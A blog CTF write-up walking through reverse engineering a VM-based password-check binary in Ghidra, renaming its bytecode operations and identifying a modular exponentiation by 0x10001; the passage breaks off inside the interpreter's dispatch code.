Jekyll2019-10-10T10:44:49+00:00https://wapiflapi.github.io/feed.xmlwapiflapiBinary analysis, computer security, exploit writing, CTFs, hacking.Wannes RomboutsEfficiency: Reverse Engineering with ghidra2019-10-10T00:00:00+00:002019-10-10T00:00:00+00:00https://wapiflapi.github.io/2019/10/10/efficiency-reverse-engineering-with-ghidra<p>It’s been a while since I haven’t written anything on here, but I
thought I’d do a quick write-up for one of the challenges from
<a href="https://qual.rtfm.re/rules">RTFM</a>.</p>
<p>We’re given a single binary and told to find a flag. The executable</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/Projects/ctf/rtfm$ file efficiency_fixed
efficiency_fixed: ELF 64-bit LSB shared object, x86-64, ...
~/Projects/ctf/rtfm$ ./efficiency_fixed
Please enter the password:
foobar
</code></pre></div></div>
<p>We don’t get any more output after we entered the “password”
(<code class="highlighter-rouge">foobar</code> in the example above.)</p>
<h2 id="enter-ghidra">Enter <a href="https://github.com/NationalSecurityAgency/ghidra">Ghidra</a></h2>
<p>I’m going to be using Ghidra for the reverse engineering but other
tools work in similar ways and this write-up could probably be
followed with any of them.</p>
<p>After creating a project in ghidra for the CTF (or just using your
everything-goes-here project) and after using <code class="highlighter-rouge">File > Import File</code> to
add our binary to the project we can open it tell Ghidra that <code class="highlighter-rouge">Yes</code> we
would like to analyze the file right now when prompted.</p>
<p>In the <code class="highlighter-rouge">Symbol Tree</code> we notice there are only a dozen functions we
don’t recognize so let’s start looking at what they do.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">FUN_00101020</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// WARNING: Treating indirect jump as call</span>
<span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">code</span> <span class="o">*</span><span class="p">)(</span><span class="n">undefined</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)();</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Okay. Looking at the listing (assembly) for this we see it’s an
indirect jump to something taken at a global address. This function
also doesn’t seem to be referenced by any of the others. Let’s skip
this for now, probably not important.</p>
<h3 id="lots-of-small-functions">Lots of small functions</h3>
<p><code class="highlighter-rouge">FUN_001010a0</code> and <code class="highlighter-rouge">FUN_001010d0</code> are no more interesting than the
previous one, but then we have a whole lot of very small functions
that seem to actually do stuff.</p>
<p><strong>Most of them take two arguments and do a very simple operations.</strong>
This looks a lot like the naive implementation of byte-code
interpreters we are used to seeing in CTFs. Let’s rename all those
functions to what we assume they’ll be doing:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">FUN_00101155</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">,</span> <span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">puParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">;</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">FUN_00101155</code> seems to be some sort of <code class="highlighter-rouge">mov</code> instruction. Let’s
rename it to <code class="highlighter-rouge">do_mov_aX_bX</code>. I like being explicit about the number of
arguments they take (following “destination before source” convention)
and about whether they deference them or not. The <code class="highlighter-rouge">X</code> indicates those
arguments are dereferenced which would be obvious for the destination
(a) but not so much for the source (b). At this point you could also
take the time to update the function prototypes in Ghidra, letting it
know that they take <code class="highlighter-rouge">(int *, int *)</code> (for most of them.)</p>
<p>If we do the same for all the little functions we end up with:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">do_mov_aX_bX</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">,</span> <span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">puParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_mov_aX_b</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">,</span> <span class="n">undefined4</span> <span class="n">uParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">puParm1</span> <span class="o">=</span> <span class="n">uParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_xor_aX_bX</span><span class="p">(</span><span class="n">uint</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">,</span> <span class="n">uint</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">puParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">puParm1</span> <span class="o">^</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_add_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o">+</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_sub_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o">-</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_rol_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="n">undefined8</span> <span class="n">uParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o"><<</span> <span class="p">((</span><span class="n">byte</span><span class="p">)</span><span class="n">uParm2</span> <span class="o">&</span> <span class="mh">0x1f</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_ror_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="n">undefined8</span> <span class="n">uParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o">>></span> <span class="p">((</span><span class="n">byte</span><span class="p">)</span><span class="n">uParm2</span> <span class="o">&</span> <span class="mh">0x1f</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="dealing-with-global-variables">Dealing with global variables</h3>
<p>The functions above all follow the exact same pattern so it’s easy to
name them. We also encounter some of those small functions that read
and write to some global <code class="highlighter-rouge">DAT_something</code> variables. Let’s just
continue with our naming scheme until we find anything better to do:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">do_mov_DAT_0010506c_aX</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_0010506c</span> <span class="o">=</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_mov_DAT_00105068_cmp_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_00105068</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o">!=</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>With that last one we’re starting to see that those global variables
might be used to store things like flags and important information
about the state of the virtual machine that might (we’re guessing!)
be running inside this binary.</p>
<p>Our suspicions are confirmed by the following three functions which
look an awful lot like (unconditional) <code class="highlighter-rouge">jmp</code>, <code class="highlighter-rouge">jnz</code> (jmp if non zero)
and <code class="highlighter-rouge">jz</code> (jmp if zero).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="kt">void</span> <span class="nf">do_jmp_a</span><span class="p">(</span><span class="n">undefined4</span> <span class="n">uParm1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_00105064</span> <span class="o">=</span> <span class="n">uParm1</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_jnz_a</span><span class="p">(</span><span class="n">undefined4</span> <span class="n">uParm1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">DAT_00105068</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_00105064</span> <span class="o">=</span> <span class="n">uParm1</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_jz_a</span><span class="p">(</span><span class="n">undefined4</span> <span class="n">uParm1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">DAT_00105068</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_00105064</span> <span class="o">=</span> <span class="n">uParm1</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p><strong>We are now presuming the following:</strong></p>
<ul>
<li><code class="highlighter-rouge">DAT_00105068</code> is actually a global <code class="highlighter-rouge">SHOULDJMP</code> flag.</li>
<li><code class="highlighter-rouge">DAT_00105064</code> is what is modified by the jump, it’s reasonable
to assume it is the current instruction pointer <code class="highlighter-rouge">DATA_IP</code>.</li>
</ul>
<p>We still haven’t seen anything resembling the main function, or
whatever it is that is prompting us for a password when running the
binary. We could go searching for that but let’s just finish all
functions in order, we’re almost done anyway.</p>
<h3 id="fun_001012c6---re-discovering-mathematics">FUN_001012c6 - Re-discovering mathematics.</h3>
<p>The next function is somewhat more complicated than the small
operations we’ve been seeing so far.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">FUN_001012c6</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">long</span> <span class="n">local_20</span><span class="p">;</span>
<span class="n">ulong</span> <span class="n">local_18</span><span class="p">;</span>
<span class="kt">long</span> <span class="n">local_10</span><span class="p">;</span>
<span class="n">local_10</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">local_18</span> <span class="o">=</span> <span class="n">SEXT48</span><span class="p">(</span><span class="n">DAT_00104074</span><span class="p">);</span>
<span class="n">local_20</span> <span class="o">=</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="n">piParm1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">local_18</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">local_18</span> <span class="o">&</span> <span class="mi">1</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">local_10</span> <span class="o">=</span> <span class="n">SUB168</span><span class="p">((</span><span class="n">ZEXT816</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o"><<</span> <span class="mh">0x40</span> <span class="o">|</span> <span class="n">ZEXT816</span><span class="p">((</span><span class="n">ulong</span><span class="p">)(</span><span class="n">local_10</span> <span class="o">*</span> <span class="n">local_20</span><span class="p">)))</span> <span class="o">%</span>
<span class="n">ZEXT816</span><span class="p">((</span><span class="n">ulong</span><span class="p">)(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="n">piParm2</span><span class="p">),</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">local_18</span> <span class="o">>>=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">local_20</span> <span class="o">=</span> <span class="n">SUB168</span><span class="p">((</span><span class="n">ZEXT816</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o"><<</span> <span class="mh">0x40</span> <span class="o">|</span> <span class="n">ZEXT816</span><span class="p">((</span><span class="n">ulong</span><span class="p">)(</span><span class="n">local_20</span> <span class="o">*</span> <span class="n">local_20</span><span class="p">)))</span> <span class="o">%</span>
<span class="n">ZEXT816</span><span class="p">((</span><span class="n">ulong</span><span class="p">)(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="n">piParm2</span><span class="p">),</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">local_10</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">SEXT48</code>, <code class="highlighter-rouge">SUB168</code> and <code class="highlighter-rouge">ZEXT816</code> are not standard C and might look
weird, <strong>ghidra’s built-in help is really good and deserves to be used a
lot.</strong></p>
<p>In the Decompiler section we find that:</p>
<blockquote>
<p><strong>SUB41(x,c) - truncation operation</strong>
The 4 is the size of the input operand (x) in bytes.
The 1 is the size of the output value in bytes.
The x is the thing being truncated
The c is the number of least significant bytes being truncated</p>
<p><strong>EXT14(x) - zero extension</strong>
The 1 is the size of the operand x
The 4 is the size of the output in bytes
This is almost always a cast from small integer types to big unsigned types.</p>
<p><strong>SEXT14(x) - signed extension</strong>
The 1 is the size of the operand x
The 4 is the size of the output in bytes
This is probably a cast from a small signed integer into a big signed integer.</p>
</blockquote>
<p>All this is simply an indication that the compiler had to juggle
between 4 byte, 8 byte and 16 byte operands for the code we’re looking
at. In most cases we probably don’t care about that for understanding
the code so let’s simplify for readability:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">FUN_001012c6</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">long</span> <span class="n">local_20</span><span class="p">;</span>
<span class="n">ulong</span> <span class="n">bit_vector</span><span class="p">;</span>
<span class="kt">long</span> <span class="n">result</span><span class="p">;</span>
<span class="n">result</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">bit_vector</span> <span class="o">=</span> <span class="n">DAT_00104074</span><span class="p">;</span>
<span class="n">local_20</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">bit_vector</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">bit_vector</span> <span class="o">&</span> <span class="mi">1</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="n">result</span> <span class="o">*</span> <span class="n">local_20</span><span class="p">)</span> <span class="o">%</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">bit_vector</span> <span class="o">>>=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">local_20</span> <span class="o">=</span> <span class="p">(</span><span class="n">local_20</span> <span class="o">*</span> <span class="n">local_20</span><span class="p">)</span> <span class="o">%</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="n">result</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Notice that we’re looping over all the bits in<code class="highlighter-rouge">bit_vector</code> (originally
<code class="highlighter-rouge">local_18</code>) and computing <code class="highlighter-rouge">local_10</code> (renamed to <code class="highlighter-rouge">result</code>) which gets
assigned to <code class="highlighter-rouge">*piParm1</code> as usual with all the operations we’ve seen so
far. <code class="highlighter-rouge">*piParm2</code> seems to be some sort of modulus as it’s only used for
that.</p>
<p>According to ghidra <code class="highlighter-rouge">DAT_00104074</code> is <code class="highlighter-rouge">0x10001</code> and there are no other
direct references to it (apart from the function we’re looking at) that
could modify it so for now let’s assume that’s a constant.</p>
<p>Rewriting this function in python and unrolling the loop:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">do_something</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
<span class="n">result</span> <span class="o">=</span> <span class="mi">1</span>
<span class="c1"># first bit is always 1
</span> <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="n">result</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
<span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
<span class="c1"># then we always have 15 bits that are 0
</span> <span class="c1"># a = (a * a) % b # 15 times, which is a ** 2 ** 15
</span> <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">**</span> <span class="mi">2</span> <span class="o">**</span> <span class="mi">15</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
<span class="c1"># last bit is always a 1 again
</span> <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="n">result</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
<span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span> <span class="c1"># Notice this line does not affect the result.
</span>
<span class="k">return</span> <span class="n">result</span>
</code></pre></div></div>
<p>Simplifying the above <em>again</em> we get:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">do_something</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">a</span> <span class="o">%</span> <span class="n">b</span>
<span class="c1"># Now a changes:
</span> <span class="n">a</span> <span class="o">=</span> <span class="n">a</span> <span class="o">**</span> <span class="mi">2</span> <span class="o">**</span> <span class="mi">16</span> <span class="c1"># because: ((a ** 2) ** 2 ** 15) % b
</span> <span class="c1"># And is used again in the result:
</span> <span class="k">return</span> <span class="p">(</span><span class="n">result</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
</code></pre></div></div>
<p>Finally we end up with <code class="highlighter-rouge">return (a * a ** 2 ** 16) % b</code></p>
<ul>
<li>which is <code class="highlighter-rouge">return (a ** (2 ** 16 + 1)) % b</code></li>
<li>which is <code class="highlighter-rouge">return (a ** 0x10001) % b</code></li>
</ul>
<p>So <strong>this function is basically just a <code class="highlighter-rouge">do_aX_pow_0x10001_mod_bX</code>
operation</strong>, If you couldn’t tell because of my way of solving maths
above: I’m not really good at maths.</p>
<p>And with that it looks like we’re done with all the small-ish
functions that take one or two parameters and store their result in
the first one.</p>
<h3 id="on-to-main">On to main.</h3>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="n">undefined8</span> <span class="nf">FUN_001017e4</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// ...</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Please enter the password: "</span><span class="p">);</span>
<span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="o">&</span><span class="n">local_28</span><span class="p">,</span><span class="mh">0x14</span><span class="p">);</span>
<span class="n">FUN_0010138b</span><span class="p">(</span><span class="o">&</span><span class="n">local_28</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Seems like we need to look at <code class="highlighter-rouge">FUN_0010138b</code> next: it takes our password as input.</p>
<p>It’s a big function! It has two <code class="highlighter-rouge">while</code> loops followed by a <code class="highlighter-rouge">do { }
while</code> with lots of <code class="highlighter-rouge">if</code>/<code class="highlighter-rouge">else</code> inside. Looks like we found whatever
it is that’s going to call all of the functions read before.</p>
<p>Let’s focus on the big mess first:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">do</span> <span class="p">{</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="kt">long</span><span class="p">)(</span><span class="n">DATA_IP</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)];</span>
<span class="n">b</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="kt">long</span><span class="p">)(</span><span class="n">DATA_IP</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)];</span>
<span class="n">op</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="kt">long</span><span class="p">)</span><span class="n">DATA_IP</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x789abcde</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_cmp_ax_bx</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">a</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x789abcdf</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x6789abcd</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jmp_a</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x6789abce</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x56789abc</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jz_a</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x56789abd</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x456789ab</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_add_aX_bX</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">a</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x456789ac</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x3456789a</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_xor_aX_bX</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">a</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x3456789b</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x23456789</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_aX_b</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">a</span><span class="p">,(</span><span class="n">ulong</span><span class="p">)</span><span class="n">b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x2345678a</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x12345678</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_aX_bX</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x12345679</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x10fedcbb</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_sub_aX_bX</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x10fedcba</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x210fedcc</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jnz_a</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x210fedcb</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x3210fedd</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_aX_pow_0x10001_mod_bX</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x3210fedc</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x43210fee</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_DAT_0010506c_aX</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x43210fed</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x543210ff</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// WARNING: Subroutine does not return</span>
<span class="n">exit</span><span class="p">(</span><span class="n">DAT_0010506c</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x543210fe</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x76543211</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_rol_aX_b</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x65432110</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_ror_aX_b</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
